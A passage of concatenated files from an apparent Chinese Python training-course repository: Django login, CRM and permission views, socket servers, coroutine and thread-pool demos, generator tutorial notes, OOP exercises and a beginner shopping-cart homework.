# sk.close() # # if __name__=='__main__': #init_socker() register_login() <file_sep>/day16/s21/app01/models.py from django.db import models # Create your models here. #创建用户库 class User(models.Model): id = models.AutoField(primary_key=True) username=models.CharField(max_length=32,unique=True) password=models.CharField(max_length=32) def __str__(self): return self.username <file_sep>/day9/协程/协程.py # 进程 计算机中资源分配的最小单位 cpu+1 # 线程 CPU 调度最小单位 cpu*5 # 协程 把一个线程拆分成几个 500 # 进程 线程 都是操作系统在调度 # 协程 是程序级别调度 # 减轻了操作系统的负担、增强了用户对程序的可控性 from gevent import monkey;monkey.patch_all() import gevent import time def eat(name): print('%s eat 1' %name) time.sleep(2) print('%s eat 2' %name) def play(name): print('%s play 1' %name) time.sleep(1) print('%s play 2' %name) g1=gevent.spawn(eat,'egon') g2=gevent.spawn(play,name='egon') g1.join() g2.join() # gevent.joinall([g1,g2]) print('主') <file_sep>/day6/关联.py # from math import pi # class Cricle: # def __init__(self,r): # self.r=r # @property # def area(self): # return self.r ** 2 *pi # def perimeter(self): # return self.r *2 * pi # c=Cricle(3) # # print(c.area()) # print(c.area) # print(c.perimeter()) #计算房间的面积 class Room: def __init__(self,chang,kuan,gao): self.chang=chang self.kuan=kuan self.gao=gao def area(self): return self.chang*self.kuan*self.gao a = Room(2,3,4) print(a.area())<file_sep>/day24/auto - 9 - 任务:构建权限和菜单的数据结构/auto - 9 - 任务:构建权限和菜单的数据结构/app01/urls.py from django.conf.urls import url,include from django.contrib import admin from app01 import views urlpatterns = [ url(r'^login/$', views.login), ] <file_sep>/复习/循环.py # 如果while循环被break打断,就不走else count = 1 while count < 5: if count ==4: break print(count) count += 1 else: print('循环正常完毕') # 打印1-10 ,7除外 # count=0 # while count <10: # count += 1 # if count==7: # pass # else: # print(count) # 求1到100所有数之和 # a=0 # sum=0 # while a <100: # a=a+1 # sum=sum+a # print(sum) # 求1到100所有奇数之和 # a=0 # while a < 100: # a = a + 1 # if a % 2 == 1: # print(a) # 所有偶数 # a=0 # while a < 100: # a = a + 1 # if a % 2 == 0: # print(a) # 求1-2+3-4+5 ... 99的所有数的和 奇数和偶数 # sum1=0#奇数 # sum2=0#偶数 # i=0 # while i <100: # i=i+1 # if i%2==1: # sum1=sum1+i#i=3 sum1+3=0+3 i=5 就是0+5 # else: # sum2=sum2+i # print(sum1-sum2) # 用户登录三次机会 ''' user='hu' passwd='123' i=0 print('请注意,一共有三次登录机会') while i <3: i+=1 username=input('请输入你的用户名:') if username==user: password=input('请输入密码:') if password==passwd: print("恭喜你,登录成功") break else: print('你输入的密码有误,你已经用了%s次了'%(i)) else: print('用户名错误,你已经用了%s次了'%(i)) ''' # msg = '老男孩python是全国范围内最好的python培训机构' # for item in msg: # print(item) # li = ['alex','银角','女神','egon','太白'] # for i in enumerate(li): # print(i) # # for index,name in enumerate(li): # print(index,name) # for index, name in enumerate(li, 100): # 起始位置默认是0,可更改 # print(index, name) <file_sep>/day10/作业/server端.py import socket sk=socket.socket() sk.bind(('127.0.0.1',8000)) sk.listen() while True: print('启动服务端....') conn,addr=sk.accept() ret=conn.recv(1024) res=ret.decode('gbk') print(res) conn.send(b'HTTP/1.1 200 OK\r\n\r\n') conn.send('注册成功'.encode('gbk')) conn.close()<file_sep>/day19/homework/s21/app01/views.py from django.shortcuts import render, HttpResponse, redirect from app01 import loging from django.contrib import auth # 必须先导入auth from django.contrib.auth.decorators import login_required # auth装饰器 from django.contrib.auth.models import User # 创建用户auth自带 log=loging.mylog() # 登录 def login(request): if request.method == "GET": return render(request, "login.html") else: next_url = request.GET.get("next") print(next_url) username = request.POST.get("username") pwd = request.POST.get("password") user_obj = auth.authenticate(request, username=username, password=pwd) if user_obj: auth.login(request, user_obj) # # 给该次请求设置了session数据,并在响应中回写cookie if next_url: return redirect(next_url) else: log.info("%s登录成功" %(username)) return redirect("/index/") else: log.error("用户名或密码错误") return render(request, "login.html", {"error_msg": "用户名或密码错误"}) # 首页 @login_required() def index(request): # user = request.user user = auth.get_user(request) return render(request, "index.html", {"v": user}) # 注销页面 @login_required def logout(request): # 删除所有当前请求相关的session request.session.delete() log.info("此用户已退出") return redirect("/login/") # 创建用户 def register_user(request): if request.method == "GET": return render(request, "register_user.html") else: username = request.POST.get("username") pwd = request.POST.get("<PASSWORD>") user_obj = User.objects.create_user(username=username, password=pwd) # 用auth自带的去创建用户,这里用的是数据库自带的user表 log.info("注册了%s用户" %(username)) return redirect("/login/") # 更改密码 @login_required def change_password(request): user = auth.get_user(request) state = None if request.method == 'POST': old_password = request.POST.get('old_password', '') new_password = request.POST.get('new_password', '') repeat_password = request.POST.get('repeat_password', '') if user.check_password(old_password): if not new_password: state = 'empty' elif new_password != repeat_password: state = '两次密码不一致' log.error("两次密码不一致") return render(request, "change_password.html", {"error_new": state, "v": user}) else: user.set_password(<PASSWORD>) user.save() return redirect("/login/") else: state = '原始密码不对' log.error("原始密码不对") return render(request, "change_password.html", {"error_old": state, "v": user}) return render(request, 'change_password.html', {"v": user}) <file_sep>/day4/4.迭代器和生成器.py # 迭代器 # 如何从列表、字典中取值的 # index索引 ,key # for循环 # 凡是可以使用for循环取值的都是可迭代的 # 可迭代协议 :内部含有__iter__方法的都是可迭代的 # 迭代器协议 :内部含有__iter__方法和__next__方法的都是迭代器 # print(dir([1,2,3])) # lst_iter = [1,2,3].__iter__() # print(lst_iter.__next__()) # print(lst_iter.__next__()) # print(lst_iter.__next__()) # for i in [1,2,3]: # [1,2,3].__iter__() # print(i) # l = [1,2,3] # lst_iter = iter(l) # l.__iter__() # while True: # try: # print(next(lst_iter)) # lst_iter.__next__() # except StopIteration: # break # 什么是可迭代的 # 什么是迭代器 迭代器 = iter(可迭代的),自带一个__next__方法 # 可迭代 最大的优势 节省内存 # from collections import Iterable,Iterator # print(range(100000000)) # print(isinstance(range(100000000),Iterable)) # print(isinstance(range(100000000),Iterator)) # py2 range 不管range多少 会生成一个列表 这个列表将用来存储所有的值 # py3 range 不管range多少 都不会实际的生成任何一个值 # 迭代器的优势: # 节省内存 # 取一个值就能进行接下来的计算 ,而不需要等到所有的值都计算出来才开始接下来的运算 —— 快 # 迭代器的特性:惰性运算 # f = open() # for line in f: # 列表 字典 元组 字符串 集合 range 文件句柄 enumerate # 生成器 Generator # 自己写的迭代器 就是一个生成器 # 两种自己写生成器(迭代器)的机制:生成器函数 生成器表达式 # 生成器函数 # 200 0000 # 牛翔 200 0000 # 40期 # 赵英杰 200 0000 # 21 60 60件衣服 # 200 0000 - 60 # 500期 0 # 501 # def cloth(num): # ret = [] # for i in range(num): # ret.append('cloth%s'%i) # return ret # 凡是带有yield的函数就是一个生成器函数 # def func(): # print('****') # yield 1 # print('^^^^') # yield 2 # 记录当前所在的位置,等待下一次next来触发函数的状态 # # g = func() # print('--',next(g)) # print('--',next(g)) # 生成器函数的调用不会触发代码的执行,而是会返回一个生成器(迭代器) # 想要生成器函数执行,需要用next # def cloth_g(num): # for i in range(num): # yield 'cloth%s'%i # # # g = cloth_g(1000) # print(next(g)) # print(next(g)) # print(next(g)) # 使用生成器监听文件输入的例子 # import time # def listen_file(): # with open('userinfo') as f: # while True: # line = f.readline() # if line.strip(): # yield line.strip() # time.sleep(0.1) # # g = listen_file() # for line in g: # print(line) # send关键字 # def func(): # print(11111) # ret1 = yield 1 # print(22222,'ret1 :',ret1) # ret2 = yield 2 # print(33333,'ret2 :',ret2) # yield 3 # # # g = func() # ret = next(g) # print(ret) # print(g.send('alex')) # 在执行next的过程中 传递一个参数 给生成器函数的内部 # print(g.send('金老板')) # 想生成器中传递值 有一个激活的过程 第一次必须要用next触发这个生成器 # 例子 # 计算移动平均值 # 12 13 15 18 # 月度 的 天平均收入 # def average(): # sum_money = 0 # day = 0 # avg = 0 # while True: # money = yield avg # sum_money += money # day += 1 # avg = sum_money/day # # g = average() # next(g) # print(g.send(200)) # print(g.send(300)) # print(g.send(600)) # 预激生成器 # def init(func): # def inner(*args,**kwargs): # ret = func(*args,**kwargs) # next(ret) # 预激活 # return ret # return inner # # @init # def average(): # sum_money = 0 # day = 0 # avg = 0 # while True: # money = yield avg # sum_money += money # day += 1 # avg = sum_money/day # # g = average() # print(g.send(200)) # print(g.send(300)) # print(g.send(600)) # # yield from def generator_func(): yield from range(5) yield from 'hello' # for i in range(5): # yield i # for j in 'hello': # yield j # g = generator_func() # for i in generator_func(): # print(i) g1 = generator_func() g2 = generator_func() next(generator_func()) next(generator_func()) # 如何从生成器中取值 # 第一种 :next 随时都可以停止 最后一次会报错 # print(next(g)) # print(next(g)) # 第二种 :for循环 从头到尾遍历一次 不遇到break、return不会停止 # for i in g: # print(i) # 第三种 :list tuple 数据类型的强转 会把所有的数据都加载到内存里 非常的浪费内存 # print(g) # print(list(g)) # 生成器函数 是我们python程序员实现迭代器的一种手段 # 主要特征是 在函数中 含有yield # 调用一个生成器函数 不会执行这个函数中的带码 只是会获得一个生成器(迭代器) # 只有从生成器中取值的时候,才会执行函数内部的带码,且每获取一个数据才执行得到这个数据的带码 # 获取数据的方式包括 next send 循环 数据类型的强制转化 # yield返回值的简便方法,如果本身就是循环一个可迭代的,且要把可迭代数据中的每一个元素都返回 可以用yield from # 使用send的时候,在生成器创造出来之后需要进行预激,这一步可以使用装饰器完成 # 生成器的特点 : 节省内存 惰性运算 # 生成器用来解决 内存问题 和程序功能之间的解耦 # 列表推倒式 # new_lst = [] # for i in range(10): # new_lst.append(i**2) # print(new_lst) # print([i**2 for i in range(10)]) # l = [1,2,3,-5,6,20,-7] # print([i%2 for i in range(10)]) # l = [1,2,3,-5,6,20,-7] # print([num for num in l if num%2 == 1]) # 30以内所有能被3整除的数 # print([i for i in range(30) if i%3 ==0]) # # 30以内所有能被3整除的数的平方 # print([i**2 for i in range(30) if i%3 ==0]) # 找到嵌套列表中名字含有两个‘e’的所有名字 # names = [['Tom', 'Billy', 'Jefferson', 'Andrew', 'Wesley', 'Steven', 'Joe'], # ['Alice', 'Jill', 'Ana', 'Wendy', 'Jennifer', 'Sherry', 'Eva']] # print([name for name_lst in names for name in name_lst if name.count('e') == 2]) # 生成器表达式 # l = [i for i in range(30) if i%3 ==0] # 列表推倒式 排序的时候 # g = (i for i in range(30) if i%3 ==0) # 生成器表达式 庞大数据量的时候 使用生成器表达式 # print(l) # print(g) # for i in g:print(i) # 林海峰 # 面试题 # def demo(): # for i in range(4): # yield i # # g=demo() # # g1=(i for i in g) # g2=(i for i in g1) # # print(list(g1)) # print(list(g2)) # def add(n,i): # return n+i # # def test(): # for i in range(4): # yield i # # g=test() # for n in [1,3,10]: # g=(add(n,i) for i in g) # # print(list(g)) # 一个生成器 只能取一次 # 生成器在不找它要值的时候始终不执行 # 当他执行的时候,要以执行时候的所有变量值为准 <file_sep>/day15/作业/core/login.py from conf import setting import pymysql # 登录函数 def login(): conn = pymysql.connect(host=(setting.host), user=(setting.user), password=(setting.password), database=(setting.database), charset=(setting.charset)) cursor = conn.cursor() count = 0 while count < 3: count += 1 user = input('用户名:').strip() pwd = input('密码:').strip() sql = "select * from t1 where user=%s and pwd=%s" res = cursor.execute(sql, [user, pwd]) # 执行sql语句,返回sql查询成功的记录数目 if res: print('登录成功') quit() else: print('登录失败') continue cursor.close() conn.close() <file_sep>/day7/封装.py # class Person(): # __country='中国' # print(__country) # print(Person.__dict__) # print(Person._Person__country) # 不能使用这种方式去调用私有的变量 # #私有的名字,只能在类的内部使用,不能在类的外部使用 # Person.__name='XXX' #在类的外部不能定义私有变量 # print(Person.__name) # print(Person.__dict__) #私有变量: # 在类的内部 如果使用__变量的形式会发生变形,python会自动的为你加上_类名 # class Person(): # __country='中国' #私有的静态属性 # def __init__(self,name,pwd): # self.name=name # self.__pwd=pwd #私有的对象属性 # def login(self): # print(self.__dict__) # if self.name=='alex' and self.__pwd=='<PASSWORD>': # print('登录成功') # alex=Person('alex','alex3714') # alex.login() # print(alex.__dict__) # class Persion(): # def __init__(self):pass # def __制造密码转换(self): #私有方法 # print('转换成功') # def 注册(self): # inp = input('pwd>>>') # 加密之后的密码=self.__制造密码转换(inp) # alex=Persion() # alex.注册() # 静态属性 、 对象属性、 方法(动态属性) 前面加上双下划綫都会变成私有的 # 私有的特点就是只能在类的内部调用,不能在类的外部使用 #面试题: class Foo: def __init__(self): self.func() def func(self): print('in FOO') class Son(Foo): # def __init__(self): # self.func() def func(self): print('in son') s=Son() #2 class Foo: def __init__(self): self.__func() def __func(self): print('in foo') class Son(Foo): def __func(self): print('in son') s=Son()<file_sep>/day2/作业终版.py goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] shopping_car = [] salry = int(input("请输入你的金额:").strip()) while True: print("商品列表!") for i in range(len(goods)): ##给商品列表加上id,去循环goods的长度 print(i, goods[i]["name"], goods[i]["price"]) buy = input("请输入你要购买的商品ID 退出:Q:").strip() if not buy:continue ##如果是空,请继续输入 if buy.isdigit(): buy = int(buy) buy_num = input("请输入你购买的数量:").strip() if not buy_num: continue ##如果是空,请继续输入 if buy_num.isdigit(): buy_num = int(buy_num) if (goods[buy]["price"] * buy_num) < salry: ##判断商品价格是否小于你输入的金额 print("购买成功") count = 1 while count <= buy_num: ##买几个循环几次, shopping_car.append({"name": goods[buy]["name"], "price": goods[buy]["price"]}) ##把购买的商品加入到你的shoping_car列表里 count += 1 salry = salry - (goods[buy]["price"] * buy_num) ##计算余额 print("余额:%s" % (salry)) choice_goon = input("是否继续购买,如果想请按y,否则按q:") if choice_goon == "y" or choice_goon == "Y": continue else: ##退出的时候打印你已经购买的商品列表 price = 0 for i in range(len(shopping_car)): # print(i) print("订单%s: %s %s¥" % (i, shopping_car[i]["name"], shopping_car[i]["price"])) price = price + shopping_car[i]["price"] ##计算一共消费多少钱 print("一共消费:%s" % (price,)) break else: print("金额不够!") if buy == "q" or buy =="Q": print("你没购买商品") break # # # <file_sep>/day27/s21crm/crm/templates/school_list.html {% extends 'layout.html' %} {% load rbac %} {% block content %} <div class="panel panel-default"> <div class="panel-heading"> <h3 class="panel-title">学校列表</h3> </div> <div class="panel-body"> <table class="table table-bordered"> <thead> <tr> <th>学校名字</th> {% if "school_edit"|permission:request or "school_del"|permission:request %} <th>操作</th> {% endif %} </tr> </thead> <tbody> {% for row in queryset %} <tr> <td>{{ row.title }}</td> {% if "school_edit"|permission:request or "school_del"|permission:request %} <td> {% if "school_edit"|permission:request %} <a href="{% url 'school_edit' row.id %}">编辑</a> {% endif %} {# <a href="{% url 'school_del' row.id %}/">删除</a>#} {% if "school_del"|permission:request %} <a href="{% url 'school_del' row.id %}">删除</a> {% endif %} </td> {% endif %} </tr> {% endfor %} </tbody> </table> <div> {% if 'school_add'|permission:request %} <a class="btn btn-primary" href="{% url 'school_add' %}">添加</a> {% endif %} </div> </div> {% endblock %}<file_sep>/day11/9 overflow的用法.html <!--(8)overflow:--> <!----> <!--visible 默认值。内容不会被修剪,会呈现在元素框之外。--> <!--hidden 内容会被修剪,并且其余内容是不可见的。--> <!--scroll 内容会被修剪,但是浏览器会显示滚动条以便查看其余的内容。--> <!--auto 如果内容被修剪,则浏览器会显示滚动条以便查看其余的内容。--> <!--inherit 规定应该从父元素继承 overflow 属性的值。--> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>overflow用法</title> <style> body{ overflow: auto; } div{ width: 500px; height: 100px; border: 1px solid red; overflow: inherit; /*overflow: scroll;*/ } </style> </head> <body> <div> 唐朝(618年—907年),是继隋朝之后的大一统王朝,共历二十一帝,享国二百八十九年,因皇室姓李,故又称为李唐,是公认的中国最强盛的时代之一。 隋末天下群雄并起,617年,唐国公李渊晋阳起兵,次年于长安称帝建立唐朝。唐太宗继位后开创“贞观之治”。唐高宗承贞观遗风开创“永徽之治”。690年,武则天以周代唐,定都洛阳,史称武周。神龙革命后恢复唐朝国号。 [1-11] 唐玄宗即位后励精图治,开创了万邦来朝的开元盛世。 [12] 天宝末全国人口达八千万上下。 [13-16] 安史之乱后藩镇割据、宦官专权导致国力渐衰,中后期经唐宪宗元和中兴、唐武宗会昌中兴、唐宣宗大中之治国势复振。878年,爆发黄巢起义破坏了唐朝统治根基,907年,朱温篡唐,唐朝覆亡,中国进入五代十国。 [17] </div> </body> </html><file_sep>/day6/作业/作业.py import json import sys import time class School: def __init__(self,name): self.name=name def creat_class(self): print('欢迎创建班级'.center(50,'#'),'\n') class_name=input("请输入班级名称") class_obj=Classroom(class_name) print("创建班级成功,信息如下:".center(50, '-'), '\n') class_dict = { "班级名称": class_name, } class_obj.show_class() f=open('class_info','a') f.write(json.dumps(class_dict,ensure_ascii=False)) control_view() def shcool_info(self): print('学校名称%s,学校所在地%s'%(self.name,self.name)) class Classroom: def __init__(self,class_name): self.name=class_name def show_class(self): print("班级名称是%s"%self.name) ##存贮用户登录状态的 user_status = { 'username': None, 'status': False } ##登录函数 def wrapper(f2): def inner(): func1 = str(inner) func2 = str(quit) if func2 in func1: exit() if user_status.get('status'): f2() ##就是被装饰的函数 else: print('\033[1;33m注意,请先登录,在操作,超过三次锁定用户\033[0m') b = 0 while b < 3: username = input("\033[1;33m请输入你的用户名:\033[0m") password = input("\033[1;33m请输入你的密码:\033[0m") with open('..\作业\db\info',encoding='utf-8')as f1: for i in f1: a = (i.split()) if a[0] == username and a[1] == password: print(a[0],a[1]) user_status['status'] = True print("\033[1;33m登录成功\033[0m") return username else: print("登录失败,请重新登录,你已经用了%s次" % (b+1)) b += 1 return inner @wrapper def login(): ##这里重新定义一个login函数,因为你如果直接执行装饰器会报错,因为里面传了一个参数 pass @wrapper def control_view():#管理视图 choice_id = input("\n*************************请选择功能********************\n" "1.创建班级" "2.创建课程" "3.创建讲师" "4.返回" "5.退出\n: ") if choice_id == '1': schoolid.creat_class() # elif choice_id == '2': # schoolid.creat_course() # elif choice_id == '3': # #print("你好") # schoolid.create_teacher() # #print("你好") # elif choice_id == '4': # select_fun() # elif choice_id == '5': # sys.exit() @wrapper def select_school(): global schoolid choice_school_id = input("\n*************************请选择学校********************\n" "a.北京校区" "b.上海校区" "q.退出\n: ") if choice_school_id == 'a': schoolid = school1 elif choice_school_id == 'b': schoolid = school2 elif choice_school_id == 'q': sys.exit() else: print("\033[4;35m请输入真确的选项:\033[0m") @wrapper def select_fun(): # 选择功能 choice_id = input("\n*************************请选择功能********************\n" "1.学员视图" "2.讲师视图" "3.管理视图" "4.返回\n: ") # choice_id = int(choice_id) #input 输入时字符串格式下面的 choice 是int 类型 需要进行类型转换 if choice_id == '1': print("待完善") elif choice_id == '2': print("待完善") elif choice_id == '3': control_view() # print("你好11111") elif choice_id == '4': select_school() else: return time.sleep(2) def main(): while True: select_school() #选择功能# select_fun() #选择学校 if __name__ == '__main__': classrooms = {} # teachers = {} # students = {} school1 = School('昌平校区') school2 = School('浦东校区') main() # dic = {1:login, # # # } # def chiose(): # global school1 # global school2 # while True: # school1=School('昌平') # school2=School('浦东') # global login # with open('..\作业\db\shcool-mange',encoding='utf-8') as f1: # print(f1.read()) # num= int(input("请选择一个序号操作:").strip()) # if num == 1: # dic.get(num)() # #login() # elif num ==3: # schoolid.creat_class() # # # # chiose() <file_sep>/day6/多继承.py # python两种类 # 经典类 py3已经灭绝了 在python2里还存在,在py2中只要程序员不主动继承object,这个类就是经典类 —— 深度优先 # 新式类 python3所有的类都是新式类,所有的新式类都继承自object —— 在多继承中遵循广度优先算法 # 钻石继承问题 class A: def f(self): print('in A') class B(A): def f(self): print('in B') super().f() class C(A): pass def f(self): print('in C') super().f() class D(B,C): def f(self): print('in D') super().f() d = D() d.f() print(D.mro()) #可以查看继承的顺序 #super和找父类这件事是两回事 # 在单继承中 super就是找父类 # 在多级承中 super的轨迹 是根据整个模型的起始点而展开的一个广度优先顺序 遵循mro规则 ''' class A: def f(self): print('in A') class B(A): pass # def f(self): # print('in B') class C(A): pass # def f(self): # print('in C') class D(B,C): pass # def f(self): # print('in D') class E(C): pass # def f(self): # print('in B') class F(D,E): pass # def f(self): # print('in C') # d = D() # d.f() print(F.mro()) ''' class A: def f(self): print('in A') class B(A): def f(self): print('in B') class C(A): pass def f(self): print('in C') class D(B,C): def f(self): print('in D') d = D() d.f() print(D.mro())<file_sep>/day19/CMS/fault_reporting/views.py from django.shortcuts import render, redirect, HttpResponse from django import views from django.contrib import auth import random from utils.geetest import GeetestLib # 导入滑动验证码的模块 #请在官网申请ID使用,示例ID不可使用 pc_geetest_id = "b46d1900d0a894591916ea94ea91bd2c" pc_geetest_key = "36fc3fe98530eea08dfc6ce76e3d24c4" def pcgetcaptcha(request): user_id = 'test' gt = GeetestLib(pc_geetest_id, pc_geetest_key) status = gt.pre_process(user_id) request.session[gt.GT_STATUS_SESSION_KEY] = status request.session["user_id"] = user_id response_str = gt.get_response_str() return HttpResponse(response_str) # Create your views here. class LoginView(views.View): def get(self, request): return render(request, "login.html") def post(self, request): next_url = request.GET.get("next","/index/") username = request.POST.get("username") pwd = request.POST.get("<PASSWORD>") # v_code=request.POST.get("vcode","").upper() #如果用户不写验证码就是空 # 滑动验证码开始 gt = GeetestLib(pc_geetest_id, pc_geetest_key) challenge = request.POST.get(gt.FN_CHALLENGE, '') validate = request.POST.get(gt.FN_VALIDATE, '') seccode = request.POST.get(gt.FN_SECCODE, '') status = request.session[gt.GT_STATUS_SESSION_KEY] user_id = request.session["user_id"] if status: result = gt.success_validate(challenge, validate, seccode, user_id) else: result = gt.failback_validate(challenge, validate, seccode) #滑动验证码结束 # if v_code==request.session.get("v_code"): if result: user_obj = auth.authenticate(username=username, password=pwd) if user_obj: auth.login(request, user_obj) # auth认证登录 return redirect(next_url) else: return render(request, "login.html", {"error_msg": "用户名或密码错误"}) else: return render(request, "login.html", {"error_msg": "验证码错误"}) # 首页 def index(request): return render(request, "index.html") # 验证码路径 # def vcode(request): # from PIL import Image, ImageDraw, ImageFont # 导入绘图模块 # # 定义一个生成随机颜色代码的函数 # def random_color(): # return random.randint(0, 255), random.randint(0, 255), random.randint(0, 255) # # # 创建一个随机背景颜色的图片对象 # image_obj = Image.new( # "RGB", # (250, 35), # 背景图片的长和宽 # random_color() # ) # # 在该图片对象上生成一个画笔对象 # draw_obj = ImageDraw.Draw(image_obj) # # 加载一个字体对象 # font_obj = ImageFont.truetype('static/font/kumo.ttf', 28) # 字体大小 # tmp = [] # for i in range(5): # l = chr(random.randint(97, 122)) # 生成随机的小写字母 # u = chr(random.randint(65, 90)) # 生成随机的大写字母 # n = str(random.randint(0, 9)) # 生成一个随机的数字 # # 从上面三个随机选一个 # r = random.choice([l, u, n]) # # 将选中过的那个字符写到图片上 # draw_obj.text((40 * i + 30, 0), r, fill=random_color(), font=font_obj) # text指定的是从那开始写位置,fill是字体颜色 # tmp.append(r) # # v_code = "".join(tmp).upper() # # 将生成的验证码保存 # request.session["v_code"] = v_code # # # 直接在内存中保存图片替代io操作 # from io import BytesIO # f1 = BytesIO() # image_obj.save(f1, format="PNG") # 将背景图片保存到f1里面 # img_data = f1.getvalue() # 去f1取图片 # return HttpResponse(img_data, content_type="image/png") <file_sep>/student_guanli_system/conf/settings.py #定义目录路径 userinfo = '../db/userinfo' school_info = '../db/school_info' course_info = '../db/course_info' class_info = '../db/class_info' teacher_info = '../db/teacher_info' student_info = '../db/student_info' classes_dir = '../db/classes' # with open('../db/userinfo','r') as f1: # print(f1.read()) # # for i in f1: # # print(i.strip())<file_sep>/day9/线程/线程池.py #线程池 # import time # from concurrent.futures import ThreadPoolExecutor,ProcessPoolExecutor # def func(num): # print(num) # time.sleep(1) # print(num) # if __name__ == '__main__': # t=ThreadPoolExecutor(20) # for i in range(50): # t.submit(func,i) # t.shutdown() # print('done') #map的简便用法 # import os,time,random # from concurrent.futures import ThreadPoolExecutor # def task(n): # print('%s is runing' %os.getpid(),n) # time.sleep(random.randint(1,3)) # return n**2 # if __name__ == '__main__': # executor=ThreadPoolExecutor(max_workers=3) # # for i in range(11): # # future=executor.submit(task,i) # executor.map(task,range(1,12)) #map取代了for+submit #把1到12都赋值给n #callback(回调函数) # import time # import random # from concurrent.futures import ThreadPoolExecutor # from threading import current_thread # urls=[ # 'https://www.baidu.com', # 'https://www.python.org', # 'https://www.openstack.org', # 'https://help.github.com/', # 'http://www.sina.com.cn/' # 'http://www.cnblogs.com/' # 'http://www.sogou.com/' # 'http://www.sohu.com/' # ] # # def analies(content): # print('分析网页',current_thread()) # print(content.result()) # # # def get_url(url): # print('爬取网页',current_thread()) # time.sleep(random.uniform(1,3)) # # analies(url*10) # return url*10 # # t = ThreadPoolExecutor(3) # print('主线程',current_thread()) # for url in urls: # t.submit(get_url,url).add_done_callback(analies) # #回调函数当执行了get_url之后,得到了一个url*10 ,然后在立即执行analies函数,并传给content参数 # concurrent.futures里面的 callback是由子线程做的 #进程池 # import time # from concurrent.futures import ProcessPoolExecutor # def func(num): # print(num) # time.sleep(1) # print(num) # if __name__ == '__main__': # t=ProcessPoolExecutor(20) # for i in range(50): # t.submit(func,i) # t.shutdown() # print('done')<file_sep>/day6/练习组合.py # 昵称,name # sex,sex # 战斗力,dps # 血液,hp ''' class Person: def __init__(self,name,sex,hp,dps): self.name=name self.sex=sex self.hp=hp self.dps=dps def attack(self,dog): #人打狗 dog.hp-=self.dps print('%s打了%s,%s掉了%s点血,还剩%s点血' %(self.name,dog.name,dog.name,self.dps,dog.hp)) class Dog: def __init__(self, name, kind, hp, dps): self.name = name self.kind=kind self.hp = hp self.dps = dps def bitt(self,person): #狗咬人 person.hp -= self.dps print('%s咬了%s,%s掉了%s点血,还剩%s点血' % (self.name, person.name, person.name, self.dps, person.hp)) class Weapon: def __init__(self,name,price,dps): self.name=name self.price=price self.dps=dps def kill(self,dog): dog.hp -= self.dps alex =Person('alex','男',250,5) ha2 = Dog('小黑','藏獒',10000,200) roubaozi = Weapon('肉包子',500000,1000) #实例化武器 alex.money=1000000 if alex.money >= roubaozi.price: alex.weapon = roubaozi #一个类的对象给另外一个类的对象当属性,就是roubaozi给alex这个对象当属性 alex.weapon.kill(ha2) #这是组合的常见方式 对象点属性是一个新的对象就是roubaozi print('小黑还剩%s点血'%(ha2.hp)) alex.attack(ha2) ha2.bitt(alex) ''' ##计算园环面积和周长,圆环面积=大圆面积-小圆面积 圆环周长=大环周长+小环周长 from math import pi class Yuan: def __init__(self,r): #4 self.r=r def mj(self): return pi*self.r**2 def zc(self): return 2*pi*self.r class huan: def __init__(self,outside_r,inside_r): #2 self.outside=Yuan(outside_r) #大圆半径 #3 self.inside=Yuan(inside_r) #小圆半径 #4 def huan_mj(self): return self.outside.mj()-self.inside.mj() #5 def huan_zc(self): return self.outside.zc()-self.inside.zc() r=huan(10,5) #1 print(r.huan_mj()) print(r.huan_zc()) # yuan=Yuan(4) # mj=yuan.mj() # zc=yuan.zc() # print(mj,zc) <file_sep>/day27/s21crm/crm/views/public.py from django.shortcuts import render, redirect from crm import models from crm.forms.public import PublicCustomModelForm from django.urls import reverse def public_customer_list(request): """ 公户列表 :param request: :return: """ if request.method == "POST": # 当用户点击申请到私户的时候执行下面代码 id_list = request.POST.getlist('pk') # 获取客户id current_user_id = request.session['user_info']['id'] # 获取当前登录用户id # 找到公户,并且把公户的课程顾问设置成当前登录用户 models.Customer.objects.filter(id__in=id_list).update(consultant_id=current_user_id) # 如果是get就查找公户,就是没有课程顾问的用户 queryset = models.Customer.objects.filter(consultant__isnull=True) # 课程顾问等于空 return render(request, 'public_custom_list.html', {'queryset': queryset}) def public_customer_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = PublicCustomModelForm() return render(request, 'public_custom_add.html', {'form': form}) form = PublicCustomModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('public_customer_list') else: return render(request, 'public_custom_add.html', {'form': form}) def public_customer_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Customer.objects.filter(id=nid).first() if request.method == "GET": form = PublicCustomModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'public_custom_edit.html', {"form": form}) form = PublicCustomModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('public_customer_list') else: return render(request, 'public_custom_edit.html', {"form": form}) def public_customer_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.Customer.objects.filter(id=nid).delete() return redirect('public_customer_list') <file_sep>/day22/luffy_permission/rbac/templatetags/ooxx.py from django import template from luffy_permission import settings register = template.Library() @register.inclusion_tag(filename="my_menu.html") def show_menu(request): menu_list = request.session[settings.MENU_SESSION_KEY] return {"menu_list": menu_list} # 把menu_list返回给my_menu.html这个页面 <file_sep>/day2/day5作业.py tu = ("alex", [11, 22, {"k1": 'v1', "k2": ["age", "name"], "k3": (11,22,33)}, 44]) #c. 请问tu变量中的"k2"对应的值是什么类型?是否可以被修改?如果可以,请在其中添加一个元素 “Seven” ''' dic = {'k1': "v1", "k2": "v2", "k3": [11,22,33]} #请循环输出所# 有的key # for i in dic.keys(): # print(i) #请循环输出所有的value # for i in dic.values(): # print(i) #请循环输出所有的key和value # for i in dic.items(): # print(i) #请在字典中添加一个键值对,"k4": "v4",输出添加后的字典 # dic["k4"] = "v4" # print(dic) #请在修改字典中 “k1” 对应的值为 “alex”,输出修改后的字典 # dic["k1"] = "alex" # print(dic) #请在k3对应的值中追加一个元素 44,输出修改后的字典 print(dic.get('k3')) dic.get('k3').append(44) print(dic) #请在k3对应的值的第 1 个位置插入个元素 18,输出修改后 a = dic.get('k3') a.insert(0,'18') print(dic) ''' ''' #3 题 av_catalog = { "欧美":{ "www.youporn.com": ["很多免费的,世界最大的","质量一般"], "www.pornhub.com": ["很多免费的,也很大","质量比yourporn高点"], "letmedothistoyou.com": ["多是自拍,高质量图片很多","资源不多,更新慢"], 